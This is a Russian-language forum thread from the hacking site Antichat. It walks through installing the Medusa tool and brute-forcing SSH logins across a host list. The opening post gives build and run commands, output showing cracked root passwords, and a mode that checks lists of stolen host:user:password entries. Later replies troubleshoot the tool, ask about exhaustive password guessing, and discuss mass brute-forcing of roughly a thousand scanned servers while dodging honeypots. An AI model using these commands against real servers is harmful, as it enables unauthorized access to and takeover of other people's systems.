ANTICHAT
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Чужие Статьи (https://forum.antichat.xyz/forumdisplay.php?f=32)
-   -   Medusa manual или брутфорс SSH! (https://forum.antichat.xyz/showthread.php?t=157036)

Xcontrol212 16.11.2009 19:04
Medusa manual или брутфорс SSH!
 
Частенько проскакивают сообщения о том как брутить ssh , а так же и других демонов .На счет брута SSH все в упор кричат hydra , он самый лучший и самый самый, но это не так .После двух часов брута на нескольких потоков он у меня нагло падал в кору , помогало только перезапуск и если смотреть на скорость то показывал не особо хорошие результаты .Но есть и другой брут medusa , так же поддерживает огромное количество модулей к различным сервисам.
Вот список того что он поддерживает:
Код:
AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC
Плюс к тому же еще и RDP в связке с rdesktop.
Скачать последнию версию можно с сайта разработчиков www.foofus.net. Для брута SSH потребуется таже библиотека что и для hydra - libssh2.

Качаем и ставим в начале библиотеку
Код:
wget http://downloads.sourceforge.net/project/libssh2/libssh2/1.1/libssh2-1.1.tar.gz?use_mirror=sunet
И ставим ее
Код:
tar -zxvf libssh2-1.1.tar.gz
cd libssh2-1.1
./configure && make && make install
Качаем медузу
Код:
wget http://www.foofus.net/jmk/tools/medusa-1.5.tar.gz
tar -zxvf medusa-1.5.tar.gz
cd medusa-1.5
./configure
Если библиотека встала нормально то после конфигурации

PHP код:
configure:     Medusa Module Build Summary
configure:
configure:     AFP             ** Disabled **
configure:     CVS             Enabled
configure:     FTP             Enabled
configure:     HTTP            Enabled
configure:     IMAP            Enabled
configure:     MSSQL           Enabled
configure:     MYSQL           Enabled
configure:     NCP             ** Disabled **
configure:     NNTP            Enabled
configure:     PCANYWHERE      Enabled
configure:     POP3            Enabled
configure:     POSTGRES        ** Disabled **
configure:     REXEC           Enabled
configure:     RLOGIN          Enabled
configure:     RSH             Enabled
configure:     SMBNT           Enabled
configure:     SMTP            Enabled
configure:     SMTP-VRFY       Enabled
configure:     SNMP            Enabled
configure:     SSH             Enabled
configure:     SVN             ** Disabled **
configure:     TELNET          Enabled
configure:     VMAUTHD         Enabled
configure:     VNC             Enabled
configure:     WRAPPER         Enabled
configure:     WEB-FORM        Enabled 
SSH будет открыт , сразу компилим и ставим .
Код:
make && make install
И смотрим как встали модуль для медусы
Код:
medusa -d

 + cvs.mod : Brute force module for CVS sessions : version 1.0.0
 + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
 + http.mod : Brute force module for HTTP : version 1.3.0
 + imap.mod : Brute force module for IMAP sessions : version 1.2.0
 + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
 + mysql.mod : Brute force module for MySQL sessions : version 1.2
 + nntp.mod : Brute force module for NNTP sessions : version 1.0.0
 + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
 + pop3.mod : Brute force module for POP3 sessions : version 1.2
 + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
 + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
 + rsh.mod : Brute force module for RSH sessions : version 1.0.1
 + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
 + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
 + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
 + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
 + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
 + telnet.mod : Brute force module for telnet sessions : version 1.2.2
 + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
 + vnc.mod : Brute force module for VNC sessions : version 1.0.1
 + web-form.mod : Brute force module for web forms : version 1.0.0
 + wrapper.mod : Generic Wrapper Module : version 1.0.1
Запускаем с 3 потоками

Код:
medusa -T 3 -H hosts.txt -U users.txt -P password.txt -O good.txt -M ssh
PHP код:
ACCOUNT CHECK: [sshHost172.16.0.16 (3 of 61 completeUserroot (1 of 11 completePasswordadmin (1 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.92 (1 of 61 completeUserroot (1 of 11 completePasswordadmin (1 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.92 (1 of 61 completeUserroot (1 of 11 completePasswordsuperpass (2 of 5 complete)
ACCOUNT FOUND: [sshHost172.16.0.92 Userroot Passwordsuperpass [SUCCESS]
ACCOUNT CHECK: [sshHost172.16.0.3 (2 of 62 completeUserroot (1 of 11 completePasswordadmin (1 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.3 (2 of 62 completeUserroot (1 of 11 completePasswordsuperpass (2 of 5 complete)
ACCOUNT FOUND: [sshHost172.16.0.3 Userroot Password:  superpass[SUCCESS]
CRITICALFailed to resolve hostname172.16.0.8172.16.0.92
ACCOUNT CHECK: [sshHost172.16.0.16 (3 of 64 completeUserroot (1 of 11 completePasswordsuperpass (2 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.16 (3 of 64 completeUserroot (1 of 11 completePasswordwew33w@ (3 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.8 (6 of 64 completeUserroot (1 of 11 completePasswordadmin (1 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.8 (6 of 64 completeUserroot (1 of 11 completePasswordsuperpass (2 of 5 complete)
ACCOUNT FOUND: [sshHost172.16.0.8 Userroot Password:  superpass[SUCCESS]
ACCOUNT CHECK: [sshHost172.16.0.16 (3 of 65 completeUserroot (1 of 11 completePasswordsupport (4 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.18 (4 of 65 completeUserroot (1 of 11 completePasswordadmin (1 of 5 complete)
ACCOUNT CHECK: [sshHost172.16.0.18 (4 of 65 completeUserroot (1 of 11 completePasswordsuperpass (2 of 5 complete)
ACCOUNT FOUND: [sshHost172.16.0.18 Userroot Passwordsuperpass [SUCCESS]
ACCOUNT CHECK: [sshHost172.16.0.16 (3 of 66 completeUserroot (1 of 11 completePasswordmail (5 of 5 complete
И смотри в лог фаил

Код:
cat good.txt
PHP код:
[root@localhost brr]# cat good
# Medusa v.1.5 (2009-07-24 19:56:33)
# /usr/local/bin/medusa -T 3 -H hosts -U users -P password -O good -M ssh
ACCOUNT FOUND: [sshHost172.16.0.92 Userroot Passwordsuperpass [SUCCESS]
ACCOUNT FOUND: [sshHost172.16.0.3 Userroot Password:  superpass[SUCCESS]
ACCOUNT FOUND: [sshHost172.16.0.8 Userroot Password:  superpass[SUCCESS]
ACCOUNT FOUND: [sshHost172.16.0.18 Userroot Password:  superpass [SUCCESS]
# Medusa has finished (2009-07-24 19:56:42). 
На бруте SSH он не останавливается , им так же можно брутить и фтп и рдп ( имхо не особо порадовало , очень много пропусков из за того что патч для rdesktop не поддерживает ответы системы на языках отличных от инглиша ).

Как оказалось , не обратил внимания , она еще и без проблем чекает акки , то-есть какие модули подключенны те и чекает , в том числе и фтп и ssh , мыло и т.д.Но фотмат записи другой .Содаем файлик с содержимым

Код:
172.16.0.3:root:superpass
Формат файла может быть и таким
Код:
host:username:password
host:username:
host::
:username:password
:username:
::password
host::password
И запускаем medusa в качестве чекера

Код:
medusa -M ssh -C hosts
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (1 of 1, 1 complete) User: root (1 of 1, 1 complete) Password: superpass (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password: superpass [SUCCESS]
Точно так же будет и чекать остальные акки , указав еще и лог для сохранения , все гуд акки будут складываться туда.

(С)n0klos

warwar 19.01.2010 20:16
ап! кто нибудь тестил данный софт?

dimhee 10.02.2010 20:21
Цитата:
Сообщение от warwar
ап! кто нибудь тестил данный софт?
Да,только что,- работает. Правда тестировалось на 1 потоке.

j0ker13 04.03.2010 02:38
искал брут ссш в гугле выдал в первых 10.
попробовал. 1 поток. брут ссш в процессе)
потом попробую фтп

Adio 04.03.2010 13:56
Устанавливаем на флешку BT4 там десктопная версия - %)

warwar 04.03.2010 14:44
есть подобное под Win?

spawn89 04.03.2010 15:02
медуза обновилась до версии 2.0 - http://www.foofus.net/?p=45

freelsd 30.03.2010 01:46
Блядb, поубивал бы вас. И так логов не прочитать, да еще и вечные access denied for user megaadmin.

ttys8 19.04.2010 16:13
Цитата:
Сообщение от freelsd
Блядb, поубивал бы вас. И так логов не прочитать, да еще и вечные access denied for user megaadmin.
сдесь или сдесь

ttys8 19.04.2010 16:39
есть возможность перебора паролей не из файла а методом подбора?

rubin 24.05.2010 21:48
подскажите, что за ошбка?

medusa -d

Available modules in "." :

Available modules in "/usr/local/lib/medusa/modules" :
+ cvs.mod : Couldn't load "/usr/local/lib/medusa/modules/cvs.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ ftp.mod : Couldn't load "/usr/local/lib/medusa/modules/ftp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ http.mod : Couldn't load "/usr/local/lib/medusa/modules/http.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ imap.mod : Couldn't load "/usr/local/lib/medusa/modules/imap.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ mssql.mod : Couldn't load "/usr/local/lib/medusa/modules/mssql.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ mysql.mod : Couldn't load "/usr/local/lib/medusa/modules/mysql.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ nntp.mod : Couldn't load "/usr/local/lib/medusa/modules/nntp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ pcanywhere.mod : Couldn't load "/usr/local/lib/medusa/modules/pcanywhere.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ pop3.mod : Couldn't load "/usr/local/lib/medusa/modules/pop3.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ rexec.mod : Couldn't load "/usr/local/lib/medusa/modules/rexec.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ rlogin.mod : Couldn't load "/usr/local/lib/medusa/modules/rlogin.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ rsh.mod : Couldn't load "/usr/local/lib/medusa/modules/rsh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ smbnt.mod : Couldn't load "/usr/local/lib/medusa/modules/smbnt.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ smtp-vrfy.mod : Couldn't load "/usr/local/lib/medusa/modules/smtp-vrfy.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ smtp.mod : Couldn't load "/usr/local/lib/medusa/modules/smtp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ snmp.mod : Couldn't load "/usr/local/lib/medusa/modules/snmp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ ssh.mod : Couldn't load "/usr/local/lib/medusa/modules/ssh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ telnet.mod : Couldn't load "/usr/local/lib/medusa/modules/telnet.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ vmauthd.mod : Couldn't load "/usr/local/lib/medusa/modules/vmauthd.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ vnc.mod : Couldn't load "/usr/local/lib/medusa/modules/vnc.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ web-form.mod : Couldn't load "/usr/local/lib/medusa/modules/web-form.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ wrapper.mod : Couldn't load "/usr/local/lib/medusa/modules/wrapper.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]

warwar 24.05.2010 22:23
No such file or directory-нет файла в директории. =/

slashd 16.06.2010 19:53
Только что опробывал медузу... и распараллеливание там сделано не очень, например:
1. Можно брутить несколько логенов одновременно
2. Можно брутить несколько хостов одновременно
Но брутить один хост и один логен в несколько потоков НЕЛЬЗЯ :/

kitman12 08.02.2011 16:42
У меня ошибка сегметирования вылетает после 5 минут брута

dupD0M 08.02.2011 18:38
хм как не странно но все работает!и ставить её проще простой командой sudo apt-get и все либы ставятся и сразу же готова к работе!

3dx 01.03.2011 16:30
medusa -d

Код:
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

  Available modules in "." :

  Available modules in "/usr/local/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 2.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0
    + http.mod : Brute force module for HTTP : version 2.0
    + imap.mod : Brute force module for IMAP sessions : version 2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
    + mysql.mod : Brute force module for MySQL sessions : version 2.0
    + nntp.mod : Brute force module for NNTP sessions : version 2.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
    + pop3.mod : Brute force module for POP3 sessions : version 2.0
    + rexec.mod : Brute force module for REXEC sessions : version 2.0
    + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
    + rsh.mod : Brute force module for RSH sessions : version 2.0
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 2.0
    + telnet.mod : Brute force module for telnet sessions : version 2.0
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
    + vnc.mod : Brute force module for VNC sessions : version 2.0
    + web-form.mod : Brute force module for web forms : version 2.0
    + wrapper.mod : Generic Wrapper Module : version 2.0
Тут вроде все ОК

но если запускаю что то типо

medusa -T 3 -H host.txt -U users.txt -P password.txt -O good.txt -M ssh

Вижу ошибку

Код:
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

IMPORTANT: Couldn't load "ssh" [/usr/local/lib/medusa/modules/ssh.mod: cannot open shared object file: No such file or directory]. Place the module in the medusa directory, set the MEDUSA_MODULE_NAME environment variable or run the configure script again using --with-default-mod-path=[path].
IMPORTANT: Couldn't load "ssh" [/usr/local/lib/medusa/modules/ssh.mod: cannot open shared object file: No such file or directory]. Place the module in the medusa directory, set the MEDUSA_MODULE_NAME environment variable or run the configure script again using --with-default-mod-path=[path].
invokeModule failed - see previous errors for an explanation

DCrypt 01.03.2011 16:33
Цитата:
Сообщение от None
cannot open shared object file: No such file or directory
Кэп.

fl00der 01.03.2011 17:26
Сколько потоков оптимально, чтобы не пропускало?

neofit 01.03.2011 17:27
Цитата:
Сообщение от 3dx
medusa -d
Код:
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

  Available modules in "." :

  Available modules in "/usr/local/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 2.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0
    + http.mod : Brute force module for HTTP : version 2.0
    + imap.mod : Brute force module for IMAP sessions : version 2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
    + mysql.mod : Brute force module for MySQL sessions : version 2.0
    + nntp.mod : Brute force module for NNTP sessions : version 2.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
    + pop3.mod : Brute force module for POP3 sessions : version 2.0
    + rexec.mod : Brute force module for REXEC sessions : version 2.0
    + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
    + rsh.mod : Brute force module for RSH sessions : version 2.0
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 2.0
    + telnet.mod : Brute force module for telnet sessions : version 2.0
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
    + vnc.mod : Brute force module for VNC sessions : version 2.0
    + web-form.mod : Brute force module for web forms : version 2.0
    + wrapper.mod : Generic Wrapper Module : version 2.0
Тут вроде все ОК
но если запускаю что то типо
medusa -T 3 -H host.txt -U users.txt -P password.txt -O good.txt -M ssh
Вижу ошибку
Код:
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

IMPORTANT: Couldn't load "ssh" [/usr/local/lib/medusa/modules/ssh.mod: cannot open shared object file: No such file or directory]. Place the module in the medusa directory, set the MEDUSA_MODULE_NAME environment variable or run the configure script again using --with-default-mod-path=[path].
IMPORTANT: Couldn't load "ssh" [/usr/local/lib/medusa/modules/ssh.mod: cannot open shared object file: No such file or directory]. Place the module in the medusa directory, set the MEDUSA_MODULE_NAME environment variable or run the configure script again using --with-default-mod-path=[path].
invokeModule failed - see previous errors for an explanation
Попробуй укозать полный путь /usr/bin/medusa где она у тебя установленна.

DCrypt 01.03.2011 17:30
Цитата:
Сообщение от fl00der
Сколько потоков оптимально, чтобы не пропускало?
Зависит от канала. Поэксперементируй.

Avto_piloT 01.03.2011 20:33
А кто нить кромее ssh ешё что нить брутил ?он так же эффективно работает с другими протоколами?

fl00der 05.03.2011 17:12
Цитата:
Сообщение от rubin
подскажите, что за ошбка?
medusa -d
Available modules in "." :
Available modules in "/usr/local/lib/medusa/modules" :
+ cvs.mod : Couldn't load "/usr/local/lib/medusa/modules/cvs.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ ftp.mod : Couldn't load "/usr/local/lib/medusa/modules/ftp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ http.mod : Couldn't load "/usr/local/lib/medusa/modules/http.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ imap.mod : Couldn't load "/usr/local/lib/medusa/modules/imap.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ mssql.mod : Couldn't load "/usr/local/lib/medusa/modules/mssql.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ mysql.mod : Couldn't load "/usr/local/lib/medusa/modules/mysql.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ nntp.mod : Couldn't load "/usr/local/lib/medusa/modules/nntp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ pcanywhere.mod : Couldn't load "/usr/local/lib/medusa/modules/pcanywhere.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ pop3.mod : Couldn't load "/usr/local/lib/medusa/modules/pop3.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ rexec.mod : Couldn't load "/usr/local/lib/medusa/modules/rexec.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ rlogin.mod : Couldn't load "/usr/local/lib/medusa/modules/rlogin.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ rsh.mod : Couldn't load "/usr/local/lib/medusa/modules/rsh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ smbnt.mod : Couldn't load "/usr/local/lib/medusa/modules/smbnt.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ smtp-vrfy.mod : Couldn't load "/usr/local/lib/medusa/modules/smtp-vrfy.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ smtp.mod : Couldn't load "/usr/local/lib/medusa/modules/smtp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ snmp.mod : Couldn't load "/usr/local/lib/medusa/modules/snmp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ ssh.mod : Couldn't load "/usr/local/lib/medusa/modules/ssh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ telnet.mod : Couldn't load "/usr/local/lib/medusa/modules/telnet.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ vmauthd.mod : Couldn't load "/usr/local/lib/medusa/modules/vmauthd.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ vnc.mod : Couldn't load "/usr/local/lib/medusa/modules/vnc.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ web-form.mod : Couldn't load "/usr/local/lib/medusa/modules/web-form.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
+ wrapper.mod : Couldn't load "/usr/local/lib/medusa/modules/wrapper.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
Блин у меня такая же проблема точно возникла, при установки libssh2 вроде все нормально было, при сборке Медузы тоже, а тут вот такое.

Точь в точь как у этого автора.

В чем проблема???

Unknown 05.03.2011 17:40
Цитата:
Сообщение от fl00der
Блин у меня такая же проблема точно возникла, при установки libssh2 вроде все нормально было, при сборке Медузы тоже, а тут вот такое.
Точь в точь как у этого автора.
В чем проблема???
cannot open shared object file: No such file or directory

либо вы не из под рута это делаете, либо не туда установили их, ибо в /usr/local/lib/medusa/modules/ этих модов нету.

скачай другой пакет и пробуй его поставить.

НTL 05.04.2011 20:10
Как брутить не по списку а полным перебором?

neofit 05.04.2011 21:46
Цитата:
Сообщение от Avto_piloT
А кто нить кромее ssh ешё что нить брутил ?он так же эффективно работает с другими протоколами?
ssh, ftp на ура.

neofit 05.04.2011 21:47
Цитата:
Сообщение от НTL
Как брутить не по списку а полным перебором?
????

snet 08.04.2011 13:07
fl00der, rubin, и у меня такая же проблема была, я просто сделал apt-get install medusa и все стало на места.

An0n1M 14.04.2011 04:09
Не мучайтесь /showthread.php?p=2636832#post2636832 поставил и забыл.

HBWS 15.04.2011 10:38
а я больше гидру люблю...

artem9933 30.04.2011 19:25
скиньте ктото файт /usr/local/lib/medusa/modules/ssh.mod плз без него медуза не пашет(

kAtze 22.09.2011 15:58
брут одного логина не по словарю а методом простого подбора символов есть?

скажите плз

dupD0M 22.09.2011 16:40
Цитата:
Сообщение от kAtze
брут одного логина не по словарю а методом простого подбора символов есть?
скажите плз
такого медуза сама делать не сможет!есть связки какието для таих целей какие невкурсе

Ollorin 23.09.2011 17:48
Цитата:
Сообщение от kAtze
брут одного логина не по словарю а методом простого подбора символов есть?
скажите плз
ну а что мешает в файл с логинами записать тот самый , а файл с паролями сгенерировать чем-то?

Ищите генераторы паролей, создавайте список паролей необходимой длины и состоящих из выбранных символов (прописные\заглавные буквы, спецсимволы и т.д.)

всё намного проще, чем кажется, всегда.

kAtze 25.09.2011 14:44
Цитата:
Сообщение от Ollorin
ну а что мешает в файл с логинами записать тот самый , а файл с паролями сгенерировать чем-то?
Ищите генераторы паролей, создавайте список паролей необходимой длины и состоящих из выбранных символов (прописные\заглавные буквы, спецсимволы и т.д.)
всё намного проще, чем кажется, всегда.
неподумал, спасибо)))))

bakey 26.03.2012 00:18
помогите пожалуйста не ставится libssh2. В конфигурации медузы shh disabled. Ставлю на vmware backtrack 5

bakey 26.03.2012 01:33
все разобрался. скачал более раннюю версию

neofit 28.07.2012 15:38
Цитата:
Сообщение от kAtze
неподумал, спасибо)))))
Зачем записывать в файл -U для файла -u для логина например: -u root

CTO 29.07.2012 15:33
По вопросу к SSH2.

Медуза , гидра + третий проект есть у nmap , название не помню.

Говоно все - это. Можно снять но только для себе не больше.

Весь перечисленный выше софт быстро затыкается по ловушкам от SSH и все потоки забиваются в "черные дыры" (разного рода ловушки.), сканер забивается и зависает.

В глобальных масштабах, нужен свой кодер и самописный софт.

Так, что народ не надейтесь, что снимите тут сливки.

Если даже скрипт Хантера на перле устарел... Его хоть править можно, а выше перечисленное дерьмо безнадежно.

b3 29.07.2012 19:46
Цитата:
Сообщение от None
Если даже скрипт Хантера на перле устарел... Его хоть править можно, а выше перечисленное дерьмо безнадежно.
Разве "выше перечисленное гавно" не опенсорс? И что значит "устарел"? Возможно некоторые функции ушли в дебрекейд, но протокол то изменился от этого, а данный софт работает по стандартам РФЦ и устареть просто не может пока не выйдет следующая версия протокола ssh

CTO 29.07.2012 21:34
Я не про РФС имел ввиду.

Не могу сказать точно, но мне кажется, что не такой уж он и открытый код именно эти продукты.

Тот кто тестил данный софт на практике по бруту SSH2

Поймет, что я имею ввиду по поводу

"софт быстро затыкается по ловушкам от SSH и все потоки забиваются в "черные дыры" (разного рода ловушки.)" :

Ну пример любой логин с любым паролем дает верный конект, ну или как бы авторизация идет, но не идет сокет проваливается в дыру и не отрывается(1 поток забивается намертво и.т.д), много таких разнообразных ловушек. Весь софт, который перечислен выше включая его последнии версии под брут SSH в глобальном смысле не годится.

Это не тоже самое , что брутить RDP, там не форточники держат сервера.

Примерно около 1000 просканеных серверов дают полную остановку бруту по SSH протоколу.


Время: 15:46
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице